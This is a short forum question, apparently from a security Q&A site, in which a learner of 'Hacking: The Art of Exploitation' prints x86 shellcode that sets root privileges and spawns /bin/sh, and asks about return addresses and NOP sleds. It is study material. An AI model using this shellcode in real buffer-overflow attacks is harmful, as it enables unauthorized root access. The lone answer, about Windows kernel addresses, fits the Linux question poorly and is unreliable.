1

I'm learning exploits from the book Hacking: The Art of Exploitation. The shellcode below was written to enable higher privilege access to files.

\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80
\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62
\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89\xe1\xcd\x80 

However, it seems the shellcode doesn't work for the addresses on my computer (with a NOP sled, 0xffffd9e2 repeated 40 times), since the author wrote the shellcode in the book for 0xbffff6f6. I wonder if I need to write a specific shellcode for 0xffffd9e2.

Gilles 'SO- stop being evil'
b3l4rus
  • Is the stack executable? Have you confirmed the shellcode gets executed (use gdb)? – Zzz Jul 06 '12 at 11:45

1 Answer

3

In Windows, there can be a problem with kernel addresses. Each service pack has different kernel addresses. I'd suggest taking "cross platform" shellcode from exploit-db.com or packetstormsecurity.org

Jeff Ferland
user1106128